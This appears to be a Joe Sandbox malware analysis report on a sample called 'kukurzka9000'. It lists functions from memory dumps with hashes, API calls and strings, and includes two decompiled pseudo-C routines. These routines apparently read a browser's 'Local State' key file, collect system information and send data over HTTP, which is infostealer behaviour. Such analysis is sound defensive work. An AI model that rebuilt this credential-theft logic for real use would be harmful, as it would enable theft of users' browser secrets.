Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c78de96184f9a35f28283014b90c132c45570b675f53bf2a6977543753af1da
Instruction ID: 8a2f8ac5f523039afe2c3f3bc067c911aa72607420b9d2f357ed482a5b943b8d
Opcode Fuzzy Hash: 1c78de96184f9a35f28283014b90c132c45570b675f53bf2a6977543753af1da
Instruction Fuzzy Hash: 26A1C372A10215AFDB01ABEADE45EEE7BB9EF48310F144524F615F71A0CBB06D10CB69

Uniqueness

Uniqueness Score: -1.00%

Function 022B3203 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

., xrefs: 022B33A1

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 8eb8ff996c082bd78e62886e718282b1ca5e0bd6b9d0ceec2433230310415ef2
Instruction ID: 17ca01bee49014dea376e58c5a180271d806f5e71bdd78c1f8b44d8662b1a21b
Opcode Fuzzy Hash: 8eb8ff996c082bd78e62886e718282b1ca5e0bd6b9d0ceec2433230310415ef2
Instruction Fuzzy Hash: 5591A371A10215AFDB09DFA5DD48EAE7BB5EF48340F004968F905B72A0DB746D50CF68

Uniqueness

Uniqueness Score: -1.00%

Function 022BA37A Relevance: 22.8, APIs: 15, Instructions: 300COMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 022BA3C2
LocalFree.KERNEL32(00000000), ref: 022BA41D
LocalFree.KERNEL32(00000000), ref: 022BA424

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$FolderPathSpecial
String ID:
API String ID: 1941890384-0
Opcode ID: 72788095e3ba856c56753af6b7a68af839d158276ac543cc7c9517f84d2339a1
Instruction ID: 888374713628e3e3d49f686ee3bd222826e3a1e39951a0b09e2f4af5596d61a4
Opcode Fuzzy Hash: 72788095e3ba856c56753af6b7a68af839d158276ac543cc7c9517f84d2339a1
Instruction Fuzzy Hash: 65A1C2B1A10215AFDB05DBE5DD89FEE7BB9EF48350F004428F615B7290DBB49910CB68

Uniqueness

Uniqueness Score: -1.00%

Function 022B7BC0 Relevance: 22.7, APIs: 14, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?,?,?,?,?,?,?,022B6F57), ref: 022B7D96
LocalFree.KERNEL32(?,?,?,?,?,?,?,022B6F57), ref: 022B7DA4
LocalFree.KERNEL32(00000000), ref: 022B7DBB
LocalFree.KERNEL32(00000000), ref: 022B7DC6
LocalFree.KERNEL32(00000000), ref: 022B7DD1
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,022B6F57), ref: 022B7E01
LocalFree.KERNEL32(?,?,?,?,?,?,?,022B6F57), ref: 022B7E17
LocalFree.KERNEL32(?,?,?,?,?,?,?,022B6F57), ref: 022B7E2F
LocalFree.KERNEL32(00000000), ref: 022B7E3E
LocalFree.KERNEL32(00000000), ref: 022B7E49
LocalFree.KERNEL32(00000000), ref: 022B7E54
LocalFree.KERNEL32(?,?,?,?,?,?,?,022B6F57), ref: 022B7E66
LocalFree.KERNEL32(00000000), ref: 022B7E75
LocalFree.KERNEL32(00000000), ref: 022B7E84

Strings

.dll, xrefs: 022B7D5B

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID: .dll
API String ID: 2826327444-2738580789
Opcode ID: 95061837a91f269392e0105e5022292588c8a9051f5e52f426446199278b41c2
Instruction ID: a2ec7f0a6232140f6706e4df41e0c53e878df594a1cfe5a975e1db0054f81eac
Opcode Fuzzy Hash: 95061837a91f269392e0105e5022292588c8a9051f5e52f426446199278b41c2
Instruction Fuzzy Hash: 2381D776A102169BDB06DFF5DD84ABEB7B9AF84380F044829E901F7294DB74ED40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 022B2F4B Relevance: 22.7, APIs: 15, Instructions: 223fileCOMMON

Download Yara Rule

APIs

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

GetFileSize.KERNEL32(00000000,00000000), ref: 022B3042
LocalFree.KERNEL32(00000000), ref: 022B316F
LocalFree.KERNEL32(?), ref: 022B3178
LocalFree.KERNEL32(?), ref: 022B317F
LocalFree.KERNEL32(00000000), ref: 022B3186
FindClose.KERNEL32(00000002), ref: 022B31AD
LocalFree.KERNEL32(00000002), ref: 022B31B6
LocalFree.KERNEL32(?), ref: 022B31C6
LocalFree.KERNEL32(00000000), ref: 022B31CD
LocalFree.KERNEL32(?), ref: 022B31D4
LocalFree.KERNEL32(00000000), ref: 022B31DB
LocalFree.KERNEL32(?), ref: 022B31E4
LocalFree.KERNEL32(?), ref: 022B31ED
LocalFree.KERNEL32(00000000), ref: 022B31F4
DeleteFileW.KERNEL32(?), ref: 022B31FB

Part of subcall function 022B9C12: LocalFree.KERNEL32(00000000,?,?,022B1F22), ref: 022B9C75

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$File$CloseDeleteFindGlobalSize
String ID:
API String ID: 952173178-0
Opcode ID: c0af09b8467f81c6f5b6c21aa0467688919da5cab6ecacf54911a18db2b2d236
Instruction ID: f1bd7c85141cb9d512ee1bdca525afca176f824c285fb7dd71f468cf7322d951
Opcode Fuzzy Hash: c0af09b8467f81c6f5b6c21aa0467688919da5cab6ecacf54911a18db2b2d236
Instruction Fuzzy Hash: CB71B471A10214AFDB05DBF2DD48EAE77B9EF89340F004928F615B72A0DB789950CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00406AF4 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 187filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

LocalFree.KERNEL32(00000000), ref: 00406BA0
wsprintfW.USER32 ref: 00406C85
lstrlenW.KERNEL32 ref: 00406C92
LocalFree.KERNEL32(?), ref: 00406CAF
DeleteFileW.KERNEL32(?), ref: 00406CE9
LocalFree.KERNEL32(?), ref: 00406CF4
LocalFree.KERNEL32(00000000), ref: 00406CFF
LocalFree.KERNEL32(00000000), ref: 00406D0B
DeleteFileW.KERNEL32(?), ref: 00406D12
LocalFree.KERNEL32(?), ref: 00406D19

Strings

TRUE, xrefs: 00406C6A, 00406C75
FALSE, xrefs: 00406C65

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile$lstrlenwsprintf
String ID: FALSE$TRUE
API String ID: 4168217763-1412513891
Opcode ID: 05357ced764b7ba51e890c53d3fe89fe9df73bb22b38b0f22364097a277e5634
Instruction ID: c49cda921923e69c5166418a1bf50fcb18860fb3db535930a4ec2c5e5cba73ac
Opcode Fuzzy Hash: 05357ced764b7ba51e890c53d3fe89fe9df73bb22b38b0f22364097a277e5634
Instruction Fuzzy Hash: 25619571A00214AFDF049FA1EE44EAE7BB5EF48310F108439F916B72A1DB759D20DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00407C62 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 232networkCOMMON

Download Yara Rule

APIs

HttpSendRequestW.WININET(00000000,?,00000000), ref: 00407E0E
InternetCloseHandle.WININET(00000000), ref: 00407E39
InternetCloseHandle.WININET(?), ref: 00407E45
InternetCloseHandle.WININET(00000000), ref: 00407E4C
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001), ref: 00407E6E
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001), ref: 00407EA6
LocalFree.KERNEL32(0000002F), ref: 00407EBA
LocalFree.KERNEL32(?), ref: 00407EC3
LocalFree.KERNEL32(00000000), ref: 00407ECA

Strings

/, xrefs: 00407CD5
mozzzzzzzzzzz, xrefs: 00407D6A

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: CloseFreeHandleInternetLocal$ByteCharMultiWide$HttpRequestSend
String ID: /$mozzzzzzzzzzz
API String ID: 2620049550-9660103
Opcode ID: 6c2859dcb35dbed66665eb2f5d4fab0f439358c126c8472905a5f17b3495ad7a
Instruction ID: 677f3e060cdc4141eea8ad2591dda170fc442a0e6149e7f0a8c7285b1f3b2b30
Opcode Fuzzy Hash: 6c2859dcb35dbed66665eb2f5d4fab0f439358c126c8472905a5f17b3495ad7a
Instruction Fuzzy Hash: 0F71BF71A00215BFEB149BA5CD45F7B77B8EB48700F04847AFA14FB2D0D6B4AD508BA9

Uniqueness

Uniqueness Score: -1.00%

Function 022B484E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 022B48AD
LocalFree.KERNEL32(?), ref: 022B4AF4
LocalFree.KERNEL32(?), ref: 022B4B14
FindClose.KERNEL32(00000000), ref: 022B4B1B

Strings

., xrefs: 022B48C1

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$CloseFind
String ID: .
API String ID: 3269183270-248832578
Opcode ID: eeb62ecb9f106cfc2f54af98f71ca67650812a65c88e6959245ad390bece3727
Instruction ID: 886233b2d64030c3f325a4a9cff3fd2c844a03ef9ba33fa742b03f8f0b8ab95a
Opcode Fuzzy Hash: eeb62ecb9f106cfc2f54af98f71ca67650812a65c88e6959245ad390bece3727
Instruction Fuzzy Hash: EB81BFB1204301AFD705DFA5DD94E6B77E5EF88344F00492CFA55A72A0DBB4E910CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00408ADD Relevance: 18.4, APIs: 12, Instructions: 387fileCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00408B01
GetClientRect.USER32(?,?), ref: 00408C7F
LocalFree.KERNEL32(?), ref: 00408F66

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000), ref: 00408E46
CloseHandle.KERNEL32(?), ref: 00408E51
DeleteFileW.KERNEL32(?), ref: 00408E58
LocalFree.KERNEL32(?), ref: 00408E5F
LocalFree.KERNEL32(?), ref: 00408E69
LocalFree.KERNEL32(00000000), ref: 00408F41
LocalFree.KERNEL32(?), ref: 00408F4B
LocalFree.KERNEL32(?), ref: 00408F55
LocalFree.KERNEL32(?), ref: 00408F5C

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$lstrlen$ClientCloseDeleteDesktopFileGlobalHandleRectWindow
String ID:
API String ID: 2265433170-0
Opcode ID: 42fc98a6e6a89340ea73cfcb9c6e7a19bfd64210cff79040dd24ad1ddd0e5be8
Instruction ID: 01ed2ab5b407dfc10e46f60f726f8b4f8e8024e8c2023dc9817dc03e66c0134a
Opcode Fuzzy Hash: 42fc98a6e6a89340ea73cfcb9c6e7a19bfd64210cff79040dd24ad1ddd0e5be8
Instruction Fuzzy Hash: 53D12E71104211AFE705DFA6DE44E2B7BF9EB89710F004D3DFA54E72A0DB7499208B6A

Uniqueness

Uniqueness Score: -1.00%

Function 022B8051 Relevance: 18.4, APIs: 12, Instructions: 387fileCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 022B8075
GetClientRect.USER32(?,?), ref: 022B81F3
LocalFree.KERNEL32(?), ref: 022B84DA

Part of subcall function 022B9C12: LocalFree.KERNEL32(00000000,?,?,022B1F22), ref: 022B9C75

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

LocalFree.KERNEL32(00000000), ref: 022B83BA
CloseHandle.KERNEL32(?), ref: 022B83C5
DeleteFileW.KERNEL32(?), ref: 022B83CC
LocalFree.KERNEL32(?), ref: 022B83D3
LocalFree.KERNEL32(?), ref: 022B83DD
LocalFree.KERNEL32(00000000), ref: 022B84B5
LocalFree.KERNEL32(?), ref: 022B84BF
LocalFree.KERNEL32(?), ref: 022B84C9
LocalFree.KERNEL32(?), ref: 022B84D0

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$ClientCloseDeleteDesktopFileGlobalHandleRectWindow
String ID:
API String ID: 2459997284-0
Opcode ID: 167d8230b01a19888c30f1c1acb982bd4371131abcba0e45631bba1b62aed7e1
Instruction ID: 8249d7f2df1c1c691d9314020fe1aa326c53b73112081555aad4ab5fd2853abf
Opcode Fuzzy Hash: 167d8230b01a19888c30f1c1acb982bd4371131abcba0e45631bba1b62aed7e1
Instruction Fuzzy Hash: 20D12CB1104211AFE705DFA6DE44E6B7BF9FB89710F004D28FA54E7260D7B49920CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 022B6068 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 187fileCOMMON

Download Yara Rule

APIs

Part of subcall function 022B9C12: LocalFree.KERNEL32(00000000,?,?,022B1F22), ref: 022B9C75

LocalFree.KERNEL32(00000000), ref: 022B6114
LocalFree.KERNEL32(?), ref: 022B6223
DeleteFileW.KERNEL32(?,?,?,?,?,022B5DDF), ref: 022B625D
LocalFree.KERNEL32(?,?,?,?,?,022B5DDF), ref: 022B6268
LocalFree.KERNEL32(00000000,?,?,?,?,022B5DDF), ref: 022B6273
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,022B5DDF), ref: 022B627F
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,022B5DDF), ref: 022B6286
LocalFree.KERNEL32(?,?,?,?,?,?,?,022B5DDF), ref: 022B628D

Strings

FALSE, xrefs: 022B61D9
TRUE, xrefs: 022B61DE, 022B61E9

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID: FALSE$TRUE
API String ID: 2194112602-1412513891
Opcode ID: 4de672f5ef5204324d375e2cd98ccb70593393dc9187e84e2e65f519924a5a45
Instruction ID: d67eb1afa743672572864f8e47309d88ea9e93c92513c8fffba4b3a88a10e61c
Opcode Fuzzy Hash: 4de672f5ef5204324d375e2cd98ccb70593393dc9187e84e2e65f519924a5a45
Instruction Fuzzy Hash: A1618231A00215AFEF059FE1EE85EAD7BB9EF48350F104428FA15B72A0DB759920CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00409906 Relevance: 16.5, APIs: 13, Instructions: 263
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00409906(void* _a4, short* _a8) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				signed int _v28;
				char _v32;
				void* _v36;
				char _v60;
				signed int _t53;
				signed int _t55;
				signed int _t60;
				void* _t64;
				signed int _t67;
				void* _t71;
				void* _t78;
				void* _t100;
				signed int _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t126;
				signed int _t127;
				signed int _t133;
				void* _t144;
				char _t149;
				void* _t158;
				void* _t162;
				signed int _t163;
				void* _t164;
				void* _t166;
				void* _t168;
				void* _t173;
				void* _t174;
				signed int _t179;
				void* _t184;

				_t127 = 0;
				_t53 =  *((intOrPtr*)( *0x40e18c))(_a4,  *0x40e430, _t162, _t126);
				_t163 = _t53;
				if(_t163 != 0) {
					_t164 = _t163 + 0x10;
					_t55 =  *((intOrPtr*)( *0x40e18c))(_t164,  *0x40e1f0);
					__eflags = _t55;
					if(_t55 == 0) {
						L5:
						_v16 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t164, _t174) + _t57);
						_t60 = E0040A3E4(_t164,  &_v16, 0, _t127);
						__eflags = _t60;
						if(_t60 != 0) {
							_t166 = _t164 + _t127 * 2 + 2;
							_t64 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t166) + _t62);
							_v8 = _t64;
							_t179 =  *((intOrPtr*)( *0x40e18c))(_t166,  *0x40e20c) - _t166 >> 1;
							_t67 = E0040A3E4(_t166,  &_v8, 0, _t179);
							__eflags = _t67;
							if(_t67 != 0) {
								_t168 = _t166 + _t179 * 2 + 2;
								_t71 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t168) + _t69);
								_v12 = _t71;
								__eflags = E0040A3E4(_t168,  &_v12, 0,  *((intOrPtr*)( *0x40e18c))(_t168,  *0x40e20c) - _t168 >> 1);
								if(__eflags != 0) {
									_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x5000);
									_a4 =  *((intOrPtr*)( *0x40e13c))(_t78, _v8);
									E00409064(__eflags,  &_a4);
									E0040919C( &_a4);
									E004090DC( *0x40e13c,  &_a4);
									E00409265( &_a4);
									E004092CF( &_v12,  &_a4);
									E0040942A( &_a4);
									E00409206(__eflags,  &_a4);
									E00409498( &_a4);
									E00409581(__eflags,  &_a4, _v12);
									_t144 = _a4;
									_v36 = _v16;
									_v32 = _t144;
									_v28 = 0;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									_t100 =  *((intOrPtr*)( *0x40e08c))(_t144);
									__eflags = _t100 - 0x40;
									if(_t100 > 0x40) {
										_t107 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
										_t108 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
										_t158 = 0x10;
										_t109 = E0040A05F(_t107, _t158);
										_v24 = _t109;
										_t110 =  *((intOrPtr*)( *0x40e13c))(_t108,  *0x40e210);
										_t173 = _v24;
										_t111 = E0040A503(_t110, _t173);
										_t149 =  *0x40e204; // 0x825d40
										_v28 = _v28 & 0x00000000;
										_v32 = _t149;
										_v24 = _t111;
										_t112 = E00408619( &_v24);
										_v20 = _t112;
										_t184 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
										 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t173, 0xffffffff, 0, 0, 0, 0);
										__eflags = 0;
										if(0 != 0) {
											 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t173, 0xffffffff, _t184, 0, 0, 0);
											__eflags = 0;
											if(0 != 0) {
												E00407EDB(_a8, _t184, 1,  &_v60, 0, 0, _v20,  &_v32);
											}
										}
										LocalFree(_t184);
										LocalFree(_v20);
										LocalFree(_v24);
										LocalFree(_t173);
									}
									LocalFree(_a4);
									LocalFree(_v8);
									LocalFree(_v12);
									L19:
									LocalFree(_v16);
									_t105 = 1;
									L20:
									return _t105;
								}
								LocalFree(_v8);
								LocalFree(_v12);
								L9:
								_push(0xfffffffc);
								L10:
								_pop(1);
								goto L19;
							}
							LocalFree(_v8);
							goto L9;
						}
						_push(0xfffffffd);
						goto L10;
					}
					_t133 = _t55 - _t164;
					__eflags = _t133;
					_t127 = _t133 >> 1;
					if(_t133 >= 0) {
						goto L5;
					}
					_t105 = 0xfffffffe;
					goto L20;
				}
				_t105 = _t53 | 0xffffffff;
				goto L20;
			}

0x00409919
0x0040991e
0x00409920
0x00409924
0x00409939
0x0040993d
0x0040993f
0x00409941
0x00409953
0x0040996f
0x00409974
0x0040997b
0x0040997d
0x00409991
0x0040999c
0x004099a4
0x004099b8
0x004099be
0x004099c5
0x004099c7
0x004099e8
0x004099f3
0x004099fb
0x00409a18
0x00409a1a
0x00409a36
0x00409a44
0x00409a4b
0x00409a54
0x00409a5d
0x00409a66
0x00409a6f
0x00409a78
0x00409a81
0x00409a8a
0x00409a96
0x00409a9b
0x00409aa7
0x00409aaf
0x00409ab2
0x00409ab5
0x00409ab7
0x00409ab8
0x00409ab9
0x00409abe
0x00409ac1
0x00409ad4
0x00409ae1
0x00409ae5
0x00409aea
0x00409afc
0x00409aff
0x00409b01
0x00409b08
0x00409b0d
0x00409b13
0x00409b17
0x00409b1d
0x00409b20
0x00409b32
0x00409b3d
0x00409b4e
0x00409b50
0x00409b52
0x00409b69
0x00409b6b
0x00409b6d
0x00409b84
0x00409b89
0x00409b6d
0x00409b8d
0x00409b96
0x00409b9f
0x00409ba6
0x00409ba6
0x00409baf
0x00409bb8
0x00409bc1
0x00409bc7
0x00409bca
0x00409bd0
0x00409bd3
0x00409bd6
0x00409bd6
0x00409a1f
0x004099cc
0x004099cc
0x004099d2
0x004099d4
0x004099d4
0x00000000
0x004099d4
0x004099cc
0x00000000
0x004099cc
0x0040997f
0x00000000
0x0040997f
0x00409945
0x00409945
0x00409947
0x00409949
0x00000000
0x00000000
0x0040994d
0x00000000
0x0040994d
0x00409926
0x00000000

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04f12ae8814da058343c2e57629071c3ba8950ef59b0fb61412e087f2168b86d
Instruction ID: d553b19b407f17417f5105702fe08a0418c2ec115b386657b372b4e652bae7b9
Opcode Fuzzy Hash: 04f12ae8814da058343c2e57629071c3ba8950ef59b0fb61412e087f2168b86d
Instruction Fuzzy Hash: FA81D5B1900205BFDB00DBA6DD45DAE7BB9EB84310B00493AF914F72D1DB78AD11CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401C87 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E00401C87(WCHAR* __ecx, WCHAR* __edx, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, void* _a16) {
				WCHAR* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				intOrPtr _v24;
				void* _t35;
				void* _t56;
				void* _t66;
				char _t73;
				void* _t74;
				WCHAR* _t77;
				void* _t78;
				intOrPtr _t81;
				WCHAR* _t93;
				void* _t96;
				intOrPtr* _t98;
				void* _t99;
				intOrPtr _t100;
				intOrPtr* _t101;
				intOrPtr _t102;
				intOrPtr* _t103;

				_v12 = __edx;
				_t73 = 0;
				_v8 = __ecx;
				_v20 = 0;
				_t35 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_t96 = _t35;
				_v16 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				if(_a16 != 0) {
					_push(__ecx);
				} else {
					PathCombineW(_t96, __ecx, _v12);
					_push(_t96);
				}
				_t98 = _a4;
				 *_t98 =  *((intOrPtr*)( *0x40e13c))( *_t98);
				_t99 = _v16;
				PathCombineW(_t99, _v8, L"Local State");
				_t77 =  *((intOrPtr*)( *0x40e03c))(_t99, 0x80000000, 1, _t73, 3, _t73, _t73);
				_v12 = _t77;
				_t78 =  *((intOrPtr*)( *0x40e14c))(_t77, _t73);
				_a16 = _t78;
				_t93 =  *((intOrPtr*)( *0x40e044))(0x40, _t78);
				_push(_t73);
				_v8 = _t93;
				_push( &_v20);
				_push(_a16 - 1);
				_push(_t93);
				_push(_v12);
				if( *((intOrPtr*)( *0x40e088))() != 0) {
					_t81 = _a16 + _a16;
					_v24 = _t81;
					_t56 =  *((intOrPtr*)( *0x40e044))(0x40, _t81);
					_t100 =  *0x40e1f4; // 0x81ace8
					_a16 = _t56;
					E0040A16F(E0040A4C2(_v8), _t100,  &_a16,  &_a16);
					_push(_a16);
					if( *((intOrPtr*)( *0x40e08c))() > 0) {
						_t101 = _a8;
						 *_t101 =  *((intOrPtr*)( *0x40e13c))( *_t101, _a16);
						LocalFree(_a16);
						_t66 =  *((intOrPtr*)( *0x40e044))(0x40, _v24);
						_t102 =  *0x40e200; // 0x829cb0
						_a16 = _t66;
						E0040A16F(E0040A4C2(_v8), _t102,  &_a16,  &_a16);
						_t74 = _a16;
						if(_t74 != 0) {
							_t103 = _a12;
							 *_t103 =  *((intOrPtr*)( *0x40e13c))( *_t103, _t74);
							LocalFree(_t74);
						}
						_t73 = 1;
					}
					CloseHandle(_v12);
					_t99 = _v16;
				}
				LocalFree(_t99);
				LocalFree(_t96);
				LocalFree(_v8);
				return _t73;
			}

0x00401c9c
0x00401c9f
0x00401ca1
0x00401ca6
0x00401ca9
0x00401cb0
0x00401cbb
0x00401cc1
0x00401cd1
0x00401cc3
0x00401cc8
0x00401cce
0x00401cce
0x00401cd2
0x00401ce6
0x00401ce8
0x00401cec
0x00401d06
0x00401d0f
0x00401d14
0x00401d1e
0x00401d29
0x00401d2b
0x00401d2f
0x00401d32
0x00401d37
0x00401d38
0x00401d39
0x00401d40
0x00401d4e
0x00401d53
0x00401d56
0x00401d5b
0x00401d61
0x00401d72
0x00401d7e
0x00401d85
0x00401d87
0x00401d99
0x00401d9b
0x00401dab
0x00401db0
0x00401db6
0x00401dc7
0x00401dcc
0x00401dd3
0x00401dd5
0x00401de3
0x00401de5
0x00401de5
0x00401ded
0x00401ded
0x00401df1
0x00401df7
0x00401df7
0x00401dfb
0x00401e02
0x00401e0b
0x00401e17

APIs

PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401CC8
PathCombineW.SHLWAPI(?,?,Local State), ref: 00401CEC
LocalFree.KERNEL32(?), ref: 00401D9B
LocalFree.KERNEL32(?), ref: 00401DE5
CloseHandle.KERNEL32(?), ref: 00401DF1
LocalFree.KERNEL32(?), ref: 00401DFB
LocalFree.KERNEL32(00000000), ref: 00401E02
LocalFree.KERNEL32(?), ref: 00401E0B

Strings

Local State, xrefs: 00401CDE

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$CombinePath$CloseHandle
String ID: Local State
API String ID: 2998194811-22827320
Opcode ID: b89154720f445bf51b2e96a239cc4b3d4fa919ccbd2c9594b8aa0e9c2ba5a7c7
Instruction ID: e8ea5197d75d1b9ffa148ce1658a92dc358bcbabd267189588b6ee53365c4b7a
Opcode Fuzzy Hash: b89154720f445bf51b2e96a239cc4b3d4fa919ccbd2c9594b8aa0e9c2ba5a7c7
Instruction Fuzzy Hash: B95141B5600215EFEB04DFA5DE85AAE7BB9EF48300F104829F915F7250D774AD20CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004092CF Relevance: 13.6, APIs: 9, Instructions: 131stringCOMMON

Download Yara Rule

APIs

lstrcpyn.KERNEL32(00000000,00409A74,00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000), ref: 0040933B
lstrcpyn.KERNEL32(00000010,00409A74,00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000), ref: 0040937B
lstrcpyn.KERNEL32(00000020,00409A74,00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000), ref: 004093BB
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000,00000000,00000000), ref: 004093C5

Part of subcall function 0040A4C2: LocalAlloc.KERNELBASE(00000040,?,?,?,00000000,00407793), ref: 0040A4E1
